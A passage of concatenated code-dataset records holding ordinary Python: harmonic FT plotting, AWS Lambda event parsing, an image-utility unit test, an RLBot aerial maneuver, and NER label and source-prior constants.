plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n if save_to is not None:\n plt.savefig(os.path.join(save_to, 'Simulated_on_experimental_harmonic_'+str(harmonic)+'.png'), transparent=True, bbox_inches='tight')\n # plt.show()\n plt.close('all')\n\n plt.figure()\n plt.title(\"Absolute Harmonic \"+ str(harmonic))\n plt.ylabel(\"Current/Dimensionless\")\n plt.plot(IFFT_time, np.absolute(exp_harmonic),'royalblue', label='Exp')\n plt.plot(IFFT_time, np.absolute(sim_harmonic),'r', linestyle='dashdot', label='Best Fit')\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n if save_to is not None:\n plt.savefig(os.path.join(save_to, 'Absolute_simulated_on_experimental_harmonic_'+str(harmonic)+'.png'), transparent=True, bbox_inches='tight')\n # plt.show()\n plt.close('all')\n\n\n high = high+spacing\n low = low+spacing\n mid = mid+spacing\n harmonic = harmonic +1\n \n \n\n def _ploting_FT_haromics(self, mid_point_index, index_window, spacing, freq, Ft_reduced_sim, FT_reduced_exp,\n print_simulated_harmonics_alone, print_all_harmonics, print_these_harmonics):\n \n dims = freq.shape\n \n harmonic = 4\n low = int(mid_point_index - index_window)\n high = int(mid_point_index+ index_window + 1)\n mid = int(mid_point_index)\n\n while high <= dims[0]:\n sim_plot = Ft_reduced_sim[low:high]\n mid_upper_sim_plot = Ft_reduced_sim[mid:high]\n lower_sim_plot = Ft_reduced_sim[low:mid]\n print('sim_plot.shape:', sim_plot.shape)\n print('mid_upper_sim_plot.shape:', mid_upper_sim_plot.shape)\n print('lower_sim_plot.shape:', lower_sim_plot.shape)\n xaxis = freq[low:high] #model.potentialRange\n xaxis_mid_upper = freq[mid:high]\n xaxis_lower= freq[low:mid]\n xaxislabel = \"freq/Hz\" # \"potential/V\"\n\n exp_plot = FT_reduced_exp[low:high]\n mid_upper_exp_plot = FT_reduced_exp[mid:high]\n lower_exp_plot = FT_reduced_exp[low:mid]\n\n if print_all_harmonics is True or harmonic in print_these_harmonics:\n plt.figure()\n plt.title(\"simulation FT\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(xaxis, np.log10(sim_plot),'r', label='simulated_harmonic_'+str(harmonic))\n plt.plot(xaxis_mid_upper[1:], np.log10(mid_upper_sim_plot[1:]),'k', label='simulated_harmonic_'+str(harmonic)+'_upper_1/2')\n plt.plot(xaxis_lower, np.log10(lower_sim_plot),'m', label='simulated_harmonic_'+str(harmonic)+'_lower_1/2')\n plt.plot(freq[mid], np.log10(Ft_reduced_sim[mid]),'cX', label='harmonic_center')\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n\n plt.figure()\n plt.title(\"experimental FT\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(xaxis, np.log10(exp_plot),'r', label='experimental_harmonic_'+str(harmonic))\n plt.plot(xaxis_mid_upper[1:], np.log10(mid_upper_exp_plot[1:]),'k', label='experimental_harmonic_'+str(harmonic)+'_upper_1/2')\n plt.plot(xaxis_lower, np.log10(lower_exp_plot),'m', label='experimental_harmonic_'+str(harmonic)+'_lower_1/2')\n plt.plot(freq[mid], np.log10(FT_reduced_exp[mid]),'cX', label='harmonic_center')\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n\n plt.figure()\n plt.title(\"simulation and experimental FT\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(freq, np.log10(FT_reduced_exp),'royalblue', label='experimental_data')\n plt.plot(xaxis, np.log10(sim_plot),'r', label='simulated_harmonic_'+str(harmonic))\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n\n\n high = high+spacing\n low = low+spacing\n mid = mid+spacing\n harmonic = harmonic +1","sub_path":"Newton_model_numba.py","file_name":"Newton_model_numba.py","file_ext":"py","file_size_in_byte":49619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529901826","text":"import base64\nimport json\n\n\ndef enum(**enums):\n return type('Enum', (), enums)\n\n\nEventType = enum(\n UNKNOWN=\"unknown\",\n KINESIS=\"kinesis\",\n SNS=\"sns\",\n DYNAMODB=\"dynamodb\"\n)\n\n\ndef get_event_type(event):\n if 'Records' in event:\n # stream like events\n records = event['Records']\n\n if len(records) == 0:\n return EventType.UNKNOWN\n\n record = records[0]\n\n if 'kinesis' in record:\n return EventType.KINESIS\n\n if 'Sns' in record:\n return EventType.SNS\n\n if 'dynamodb' in record:\n return EventType.DYNAMODB\n\n return EventType.UNKNOWN\n\n\ndef get_kinesis_event_json_data_list(event):\n records = []\n\n for record in event['Records']:\n data = base64.b64decode(record['kinesis']['data'])\n records.append(json.loads(data))\n\n return records\n\n\ndef get_sns_event_json_data_list(event):\n records = []\n\n for record in event['Records']:\n data = record['Sns']['Message']\n records.append(json.loads(data))\n\n return records\n","sub_path":"awslambdautils/lambda_events.py","file_name":"lambda_events.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"519680170","text":"#!/usr/bin/env python3\n\n# Copyright 2018 Johns Hopkins University (author: Desh Raj)\n# Apache 2.0\n\n\"\"\" \nTest cases for visualizing image with mask and compressing image with mask. \n\"\"\"\n\nfrom dataset import DatasetICDAR2015\nfrom waldo.data_visualization import visualize_mask\nfrom waldo.data_manipulation import compress_image_with_mask\nfrom waldo.core_config import CoreConfig\n\nimport sys\nimport random\nimport numpy as np\nimport unittest\n\nDL_DIR = '/export/b18/draj/icdar_2015/'\nTRANSPARENCY = 0.3\n\nclass ImageUtilsTest(unittest.TestCase):\n \"\"\"Testing image utilities: visualization and compression\n \"\"\"\n def setUp(self):\n \"\"\"This method sets up objects for all the test cases.\n \"\"\"\n icdar = DatasetICDAR2015(DL_DIR)\n data = icdar.load_data()\n self.test_object = random.choice(data['test'])\n\n self.c = CoreConfig()\n self.c.num_colors = self.test_object['img'].shape[2]\n\n self.transparency = TRANSPARENCY\n\n\n def test_visualize_object(self):\n \"\"\"Given a dictionary object as follows\n x['img']: numpy array of shape (height,width,colors)\n x['mask']: numpy array of shape (height,width), with every element categorizing it \n into one of the object ids\n The method generates an image overlaying a translucent mask on the image.\n \"\"\"\n visualize_mask(self.test_object, self.c, self.transparency)\n\n\n def test_compress_object(self):\n \"\"\"Given a dictionary object as follows\n x['img']: numpy array of shape (height,width,colors)\n x['mask']: numpy array of shape (height,width), with every element categorizing it \n into one of the object ids\n The method compresses the object and prints the original and compressed sizes.\n It also asserts that the original size should be greater than the compressed size.\n \"\"\"\n y = compress_image_with_mask(self.test_object,self.c)\n x_mem = sys.getsizeof(self.test_object)\n y_mem = sys.getsizeof(y)\n self.assertTrue(y_mem <= x_mem)\n\n\nif __name__ == '__main__':\n unittest.main()\n ","sub_path":"egs/icdar2015/v1/local/utils/image_utils_test.py","file_name":"image_utils_test.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165130570","text":"from maneuvers.kit import *\r\n\r\nfrom RLUtilities.Maneuvers import Aerial as RLUAerial\r\n\r\nclass Aerial(RLUAerial):\r\n\r\n def step(self, dt):\r\n super().step(dt)\r\n if self.total_timer > 1 and self.car.on_ground:\r\n self.finished = True\r\n\r\n def render(self, draw: DrawingTool):\r\n draw.color(draw.yellow)\r\n draw.car_trajectory(self.car, self.t_arrival)\r\n draw.color(draw.lime)\r\n draw.point(self.target)","sub_path":"RLBotPack/BotimusPrime/source/maneuvers/air/aerial.py","file_name":"aerial.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"223152612","text":"\"\"\"\n----------------------------------------------------------------------------------------------------------------------\nList of Labels, annotation formats, and\nprior probabilities used for source selection and model initialization\n\"\"\"\nimport numpy as np\n# import os\n#\n# ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nimport pathlib\nROOT_DIR = str(pathlib.Path(__file__).parent.parent.absolute())\n\nOntoNotes_LABELS = ['CARDINAL', \"COMPANY\", 'DATE', 'EVENT', 'FAC', 'GPE', 'LANGUAGE', 'LAW', 'LOC', 'MONEY',\n 'NORP', 'ORDINAL', 'ORG', 'PERCENT', 'PERSON', 'PRODUCT', 'QUANTITY', 'TIME', 'WORK_OF_ART']\n\nCoNLL_LABELS = [\"PER\", \"LOC\", \"ORG\", \"MISC\"]\n\nOntoNotes_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in OntoNotes_LABELS for bi in \"BI\"]\nOntoNotes_INDICES = {label: i for i, label in enumerate(OntoNotes_BIO)}\n\nCoNLL_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in CoNLL_LABELS for bi in \"BI\"]\nCoNLL_INDICES = {label: i for i, label in enumerate(CoNLL_BIO)}\n\nCoNLL_SOURCE_NAMES = ['BTC', 'BTC+c', 'SEC', 'SEC+c', 'company_type_detector', 'compound_detector',\n 'conll2003', 'conll2003+c', 'core_web_md', 'core_web_md+c', 'crunchbase_cased',\n 'crunchbase_uncased',\n 'date_detector',\n 'doc_history', 'doc_majority_cased', 'doc_majority_uncased', 'full_name_detector', 'geo_cased',\n 'geo_uncased',\n 'infrequent_compound_detector', 'infrequent_nnp_detector', 'infrequent_proper2_detector',\n 'infrequent_proper_detector',\n 'legal_detector', 'misc_detector', 'money_detector',\n 'multitoken_crunchbase_cased', 'multitoken_crunchbase_uncased', 'multitoken_geo_cased',\n 'multitoken_geo_uncased',\n 'multitoken_product_cased', 'multitoken_product_uncased', 'multitoken_wiki_cased',\n 'multitoken_wiki_small_cased',\n 'multitoken_wiki_small_uncased', 'multitoken_wiki_uncased', 'nnp_detector', 'number_detector',\n 'product_cased',\n 'product_uncased', 'proper2_detector', 'proper_detector', 'snips', 'time_detector', 'wiki_cased',\n 'wiki_small_cased',\n 'wiki_small_uncased', 'wiki_uncased']\n\n# CoNLL_SOURCE_TO_KEEP = [\n# 'BTC+c', 'core_web_md+c', 'crunchbase_uncased', 'wiki_uncased',\n# 'geo_uncased', 'doc_majority_uncased'\n# ]\n\nCoNLL_SOURCE_TO_KEEP = ['BTC+c', 'SEC+c', 'core_web_md+c', 'crunchbase_cased', 'crunchbase_uncased',\n 'doc_majority_cased', 'doc_majority_uncased',\n 'full_name_detector', 'geo_cased', 'geo_uncased', 'misc_detector',\n 'wiki_cased', 'wiki_uncased']\n\n# CoNLL_SOURCE_TO_KEEP = [\n# 'BTC', 'BTC+c', 'SEC', 'SEC+c', 'company_type_detector', 'compound_detector',\n# 'core_web_md', 'core_web_md+c', 'crunchbase_cased',\n# 'crunchbase_uncased',\n# 'date_detector',\n# 'doc_history', 'doc_majority_cased', 'doc_majority_uncased', 'full_name_detector', 'geo_cased',\n# 'geo_uncased',\n# 'infrequent_compound_detector', 'infrequent_nnp_detector', 'infrequent_proper2_detector',\n# 'infrequent_proper_detector',\n# 'legal_detector', 'misc_detector', 'money_detector',\n# 'multitoken_crunchbase_cased', 'multitoken_crunchbase_uncased', 'multitoken_geo_cased',\n# 'multitoken_geo_uncased',\n# 'multitoken_product_cased', 'multitoken_product_uncased', 'multitoken_wiki_cased',\n# 'multitoken_wiki_small_cased',\n# 'multitoken_wiki_small_uncased', 'multitoken_wiki_uncased', 'nnp_detector', 'number_detector',\n# 'product_cased',\n# 'product_uncased', 'proper2_detector', 'proper_detector', 'snips', 'time_detector', 'wiki_cased',\n# 'wiki_small_cased',\n# 'wiki_small_uncased', 'wiki_uncased'\n# ]\n\nNUMBER_NERS = [\"CARDINAL\", \"DATE\", \"MONEY\", \"ORDINAL\", \"PERCENT\", \"QUANTITY\", \"TIME\"]\n\n# the numbers are precision and recall\nCoNLL_SOURCE_PRIORS = {\n 'BTC': {lbs: (0.4, 0.4) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\"] else (0.3, 0.3) for lbs in\n OntoNotes_LABELS if\n lbs not in NUMBER_NERS},\n 'BTC+c': {lbs: (0.5, 0.5) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\", \"MONEY\"] else (0.4, 0.4) for lbs in\n OntoNotes_LABELS},\n 'SEC': {lbs: (0.1, 0.1) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\"] else (0.05, 0.05) for lbs in\n OntoNotes_LABELS if\n lbs not in NUMBER_NERS},\n 'SEC+c': {lbs: (0.1, 0.1) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\", \"MONEY\"] else (0.05, 0.05) for lbs in\n OntoNotes_LABELS},\n 'company_type_detector': {'COMPANY': (0.9999, 0.4)},\n 'compound_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in OntoNotes_LABELS},\n 'conll2003': {lbs: (0.7, 0.7) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\"] else (0.4, 0.4)\n for lbs in OntoNotes_LABELS if lbs not in NUMBER_NERS},\n 'conll2003+c': {lbs: (0.7, 0.7) if lbs in [\"COMPANY\", \"ORG\", \"PERSON\", \"GPE\", \"LOC\"] else (0.4, 0.4)\n for lbs in OntoNotes_LABELS},\n \"core_web_md\": {lbs: (0.9, 0.9) for lbs in OntoNotes_LABELS},\n \"core_web_md+c\": {lbs: (0.95, 0.95) for lbs in OntoNotes_LABELS},\n \"crunchbase_cased\": {lbs: (0.7, 0.6) for lbs in [\"PERSON\", \"ORG\", \"COMPANY\"]},\n \"crunchbase_uncased\": {lbs: (0.6, 0.7) for lbs in [\"PERSON\", \"ORG\", \"COMPANY\"]},\n 'date_detector': {'DATE': (0.9, 0.9)},\n 'doc_history': {lbs: (0.99, 0.4) for lbs in [\"PERSON\", \"COMPANY\"]},\n 'doc_majority_cased': {lbs: (0.98, 0.4) for lbs in OntoNotes_LABELS},\n 'doc_majority_uncased': {lbs: (0.95, 0.5) for lbs in OntoNotes_LABELS},\n 'full_name_detector': {'PERSON': (0.9999, 0.4)},\n \"geo_cased\": {lbs: (0.8, 0.8) for lbs in [\"GPE\", \"LOC\"]},\n \"geo_uncased\": {lbs: (0.8, 0.8) for lbs in [\"GPE\", \"LOC\"]},\n 'infrequent_compound_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in\n OntoNotes_LABELS},\n 'infrequent_nnp_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in\n OntoNotes_LABELS},\n 'infrequent_proper2_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in\n OntoNotes_LABELS},\n 'infrequent_proper_detector': {lbs: (0.7, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in\n OntoNotes_LABELS},\n 'legal_detector': {\"LAW\": (0.8, 0.8)},\n 'misc_detector': {lbs: (0.7, 0.7) for lbs in [\"NORP\", \"EVENT\", \"FAC\", \"GPE\", \"LANGUAGE\"]},\n 'money_detector': {'MONEY': (0.9, 0.9)},\n 'multitoken_crunchbase_cased': {lbs: (0.8, 0.6) for lbs in [\"PERSON\", \"ORG\", \"COMPANY\"]},\n 'multitoken_crunchbase_uncased': {lbs: (0.7, 0.7) for lbs in [\"PERSON\", \"ORG\", \"COMPANY\"]},\n 'multitoken_geo_cased': {lbs: (0.8, 0.6) for lbs in [\"GPE\", \"LOC\"]},\n 'multitoken_geo_uncased': {lbs: (0.7, 0.7) for lbs in [\"GPE\", \"LOC\"]},\n 'multitoken_product_cased': {\"PRODUCT\": (0.8, 0.6)},\n 'multitoken_product_uncased': {\"PRODUCT\": (0.7, 0.7)},\n 'multitoken_wiki_cased': {lbs: (0.8, 0.6) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'multitoken_wiki_small_cased': {lbs: (0.8, 0.6) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'multitoken_wiki_small_uncased': {lbs: (0.7, 0.7) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'multitoken_wiki_uncased': {lbs: (0.7, 0.7) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'nnp_detector': {lbs: (0.8, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in OntoNotes_LABELS},\n \"number_detector\": {lbs: (0.9, 0.9) for lbs in [\"CARDINAL\", \"ORDINAL\", \"QUANTITY\", \"PERCENT\"]},\n 'product_cased': {\"PRODUCT\": (0.7, 0.6)},\n 'product_uncased': {\"PRODUCT\": (0.6, 0.7)},\n 'proper2_detector': {lbs: (0.6, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in OntoNotes_LABELS},\n 'proper_detector': {lbs: (0.6, 0.8) if lbs not in NUMBER_NERS else (0.01, 0.01) for lbs in OntoNotes_LABELS},\n \"snips\": {lbs: (0.8, 0.8) for lbs in [\"DATE\", \"TIME\", \"PERCENT\", \"CARDINAL\", \"ORDINAL\", \"MONEY\"]},\n 'time_detector': {'TIME': (0.9, 0.9)},\n 'wiki_cased': {lbs: (0.6, 0.5) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'wiki_small_cased': {lbs: (0.7, 0.6) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'wiki_small_uncased': {lbs: (0.6, 0.7) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]},\n 'wiki_uncased': {lbs: (0.5, 0.6) for lbs in [\"PERSON\", \"GPE\", \"LOC\", \"ORG\", \"COMPANY\", \"PRODUCT\"]}}\n\n# In some rare cases (due to specialisations of corrections of labels), we also need to add some other labels\nfor lb_source in [\"BTC\", \"BTC+c\", \"SEC\", \"SEC+c\", \"conll2003\", \"conll2003+c\"]:\n CoNLL_SOURCE_PRIORS[lb_source].update({lbs: (0.8, 0.01) for lbs in NUMBER_NERS})\n\nOUT_RECALL = 0.9\nOUT_PRECISION = 0.8\n\n\"\"\"\n----------------------------------------------------------------------------------------------------------------------\nEvaluation-related constants\n\"\"\"\n\nCoNLL_MAPPINGS = {\"PERSON\": \"PER\", \"COMPANY\": \"ORG\", \"GPE\": \"LOC\", 'EVENT': \"MISC\", 'FAC': \"MISC\", 'LANGUAGE': \"MISC\",\n 'LAW': \"MISC\", 'NORP': \"MISC\", 'PRODUCT': \"MISC\", 'WORK_OF_ART': \"MISC\"}\n\nCONLL_SRC_PRIORS = dict()\nfor src, priors in CoNLL_SOURCE_PRIORS.items():\n transferred_lbs = dict()\n for lb_name, ps in priors.items():\n norm_lb = CoNLL_MAPPINGS.get(lb_name, lb_name)\n if norm_lb not in CoNLL_LABELS:\n continue\n if norm_lb not in transferred_lbs:\n transferred_lbs[norm_lb] = [list(), list()]\n transferred_lbs[norm_lb][0].append(ps[0])\n transferred_lbs[norm_lb][1].append(ps[1])\n for norm_lb in transferred_lbs:\n transferred_lbs[norm_lb][0] = np.mean(transferred_lbs[norm_lb][0])\n transferred_lbs[norm_lb][1] = np.mean(transferred_lbs[norm_lb][1])\n transferred_lbs[norm_lb] = tuple(transferred_lbs[norm_lb])\n CONLL_SRC_PRIORS[src] = transferred_lbs\n\n# CoNLL_SOURCE_WEIGHTS = {\n# 'BTC':0.01, 'BTC+c':0.6, 'SEC':0.01, 'SEC+c':0.4, 'company_type_detector':0.01, 'compound_detector':0.01,\n# 'conll2003':0.01, 'conll2003+c':0.01, 'core_web_md':0.01, 'core_web_md+c':0.7, 'crunchbase_cased':0.4,\n# 'crunchbase_uncased':0.35,\n# 'date_detector':0.01,\n# 'doc_history':0.01, 'doc_majority_cased':0.65, 'doc_majority_uncased':0.60, 'full_name_detector':0.9, 'geo_cased':0.7,\n# 'geo_uncased':0.65,\n# 'infrequent_compound_detector':0.01, 'infrequent_nnp_detector':0.01, 'infrequent_proper2_detector':0.01,\n# 'infrequent_proper_detector':0.01,\n# 'legal_detector':0.01, 'misc_detector':0.85, 'money_detector':0.01,\n# 'multitoken_crunchbase_cased':0.01, 'multitoken_crunchbase_uncased':0.01, 'multitoken_geo_cased':0.01,\n# 'multitoken_geo_uncased':0.01,\n# 'multitoken_product_cased':0.01, 'multitoken_product_uncased':0.01, 'multitoken_wiki_cased':0.01,\n# 'multitoken_wiki_small_cased':0.01,\n# 'multitoken_wiki_small_uncased':0.01, 'multitoken_wiki_uncased':0.01, 'nnp_detector':0.01, 'number_detector':0.01,\n# 'product_cased':0.01,\n# 'product_uncased':0.01, 'proper2_detector':0.01, 'proper_detector':0.01, 'snips':0.01, 'time_detector':0.01, 'wiki_cased':0.75,\n# 'wiki_small_cased':0.01,\n# 'wiki_small_uncased':0.01, 'wiki_uncased':0.70\n# }\n\nCoNLL_SOURCE_WEIGHTS = {'BTC':0.01, 'BTC+c':[0.6156,0.5731,0.5731,0,0,0.4948,0.4948,0.7887,0.7887], 'SEC':0.01, 'SEC+c':[0.3954,0.3818,0.3818,0.8723,0.8723,0.1963,0.1963,0.7189,0.7189], 'company_type_detector':0.01, 'compound_detector':0.01,\n 'conll2003':0.01, 'conll2003+c':0.01, 'core_web_md':0.01, 'core_web_md+c':[0.6953,0.7268,0.7268,0.678,0.678,0.5107,0.5107,0.8132,0.8132], 'crunchbase_cased':[0.3826,0,0,0,0,0.2993,0.2993,0.9189,0.9189],\n 'crunchbase_uncased':[0.3788,0,0,0,0,0.305,0.305,0.9189,0.9189],\n 'date_detector':0.01,\n 'doc_history':0.01, 'doc_majority_cased':[0.6581,0.7554,0.7554,0.8261,0.8261,0.502,0.502,0.6196,0.6196], 'doc_majority_uncased':[0.6169,0.7434,0.7434,0.8063,0.8063,0.43,0.43,0.5924,0.5924], 'full_name_detector':[0.8779,0,0,0,0,0,0,0.8779,0.8779], 'geo_cased':[0.6816,0.6816,0.6816,0,0,0,0,0,0],\n 'geo_uncased':[0.651,0.651,0.651,0,0,0,0,0,0],\n 'infrequent_compound_detector':0.01, 'infrequent_nnp_detector':0.01, 'infrequent_proper2_detector':0.01,\n 'infrequent_proper_detector':0.01,\n 'legal_detector':0.01, 'misc_detector':[0.8514,0.9334,0.9334,0.7388,0.7388,0,0,0,0], 'money_detector':0.01,\n 'multitoken_crunchbase_cased':0.01, 'multitoken_crunchbase_uncased':0.01, 'multitoken_geo_cased':0.01,\n 'multitoken_geo_uncased':0.01,\n 'multitoken_product_cased':0.01, 'multitoken_product_uncased':0.01, 'multitoken_wiki_cased':0.01,\n 'multitoken_wiki_small_cased':0.01,\n 'multitoken_wiki_small_uncased':0.01, 'multitoken_wiki_uncased':0.01, 'nnp_detector':0.01, 'number_detector':0.01,\n 'product_cased':0.01,\n 'product_uncased':0.01, 'proper2_detector':0.01, 'proper_detector':0.01, 'snips':0.01, 'time_detector':0.01, 'wiki_cased':[0.7527,0.6959,0.6959,0,0,0.9082,0.9082,0.8155,0.8155],\n 'wiki_small_cased':0.01,\n 'wiki_small_uncased':0.01, 'wiki_uncased':[0.7226,0.6763,0.6763,0,0,0.8744,0.8744,0.7784,0.7784]}\n\nNCBI_LABELS = ['DISEASE']\nNCBI_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in NCBI_LABELS for bi in \"BI\"]\nNCBI_INDICES = {label: i for i, label in enumerate(NCBI_BIO)}\n\nNCBI_SOURCE_NAMES = ['CoreDictionaryUncased', 'CoreDictionaryExact', 'CancerLike',\n 'CommonSuffixes', 'Deficiency', 'Disorder',\n 'Lesion', 'Syndrome', 'BodyTerms',\n 'OtherPOS', 'StopWords', 'Punctuation',\n 'PossessivePhrase', 'HyphenatedPhrase', 'ElmoLinkingRule',\n 'CommonBigram', 'ExtractedPhrase']\n\nNCBI_SOURCES_TO_KEEP = ['CoreDictionaryUncased', 'CoreDictionaryExact', 'CancerLike', 'BodyTerms', 'ExtractedPhrase']\n# NCBI_SOURCES_TO_KEEP = ['CoreDictionaryUncased', 'CoreDictionaryExact']\n\nNCBI_SOURCE_PRIORS = {\n 'CoreDictionaryUncased': {lbs: (0.8, 0.7) for lbs in NCBI_LABELS},\n 'CoreDictionaryExact': {lbs: (0.9, 0.5) for lbs in NCBI_LABELS},\n 'CancerLike': {lbs: (0.5, 0.4) for lbs in NCBI_LABELS},\n 'CommonSuffixes': {'DISEASE': (0.1, 0.1)},\n 'Deficiency': {'DISEASE': (0.1, 0.1)},\n 'Disorder': {'DISEASE': (0.1, 0.1)},\n 'Lesion': {'DISEASE': (0.1, 0.1)},\n 'Syndrome': {'DISEASE': (0.1, 0.1)},\n \"BodyTerms\": {lbs: (0.5, 0.4) for lbs in NCBI_LABELS},\n \"OtherPOS\": {'DISEASE': (0.1, 0.1)},\n \"StopWords\": {'DISEASE': (0.1, 0.1)},\n \"Punctuation\": {'DISEASE': (0.1, 0.1)},\n \"PossessivePhrase\": {'DISEASE': (0.1, 0.1)},\n \"HyphenatedPhrase\": {'DISEASE': (0.1, 0.1)},\n 'ElmoLinkingRule': {'DISEASE': (0.1, 0.1)},\n 'CommonBigram': {'DISEASE': (0.1, 0.1)},\n 'ExtractedPhrase': {'DISEASE': (0.9, 0.9)}\n}\n\nLAPTOP_LABELS = ['TERM']\nLAPTOP_BIO = [\"O\"] + [\"%s-%s\" % (bi, label) for label in LAPTOP_LABELS for bi in \"BI\"]\nLAPTOP_INDICES = {label: i for i, label in enumerate(LAPTOP_BIO)}\n\nLAPTOP_SOURCE_NAMES = ['CoreDictionary', 'OtherTerms', 'ReplaceThe', 'iStuff',\n 'Feelings', 'ProblemWithThe', 'External', 'StopWords',\n 'Punctuation', 'Pronouns', 'NotFeatures', 'Adv',\n 'CompoundPhrase', 'ElmoLinkingRule', 'ExtractedPhrase', 'ConsecutiveCapitals']\n\nLAPTOP_SOURCES_TO_KEEP = ['CoreDictionary', 'OtherTerms', 'iStuff', 'ExtractedPhrase', 'ConsecutiveCapitals']\n\nLAPTOP_SOURCE_PRIORS = {\n 'CoreDictionary': {lbs: (0.9, 0.7) for lbs in LAPTOP_LABELS},\n 'OtherTerms': {lbs: (0.6, 0.5) for lbs in LAPTOP_LABELS},\n 'ReplaceThe': {lbs: (0.1, 0.1) for lbs in LAPTOP_LABELS},\n 'iStuff': {'TERM': (0.6, 0.4)},\n 'Feelings': {'TERM': (0.1, 0.1)},\n 'ProblemWithThe': {'TERM': (0.1, 0.1)},\n 'External': {'TERM': (0.5, 0.4)},\n 'StopWords': {'TERM': (0.1, 0.1)},\n \"Punctuation\": {lbs: (0.5, 0.4) for lbs in LAPTOP_LABELS},\n \"Pronouns\": {'TERM': (0.1, 0.1)},\n \"NotFeatures\": {'TERM': (0.1, 0.1)},\n \"Adv\": {'TERM': (0.1, 0.1)},\n \"CompoundPhrase\": {'TERM': (0.1, 0.1)},\n \"ElmoLinkingRule\": {'TERM': (0.6, 0.4)},\n 'ExtractedPhrase': {'TERM': (0.9, 0.9)},\n 'ConsecutiveCapitals': {'TERM': (0.7, 0.6)}\n}\n\n\n\nLAPTOP_SOURCE_WEIGHTS = {\n 'CoreDictionary': [0.7,0.7,0.7],\n 'OtherTerms': [0.1,0.1,0.1],\n 'ReplaceThe': 0.01,\n 'iStuff': [0.3,0.3,0.3],\n 'Feelings': 0.01,\n 'ProblemWithThe': 0.01,\n 'External': 0.01,\n 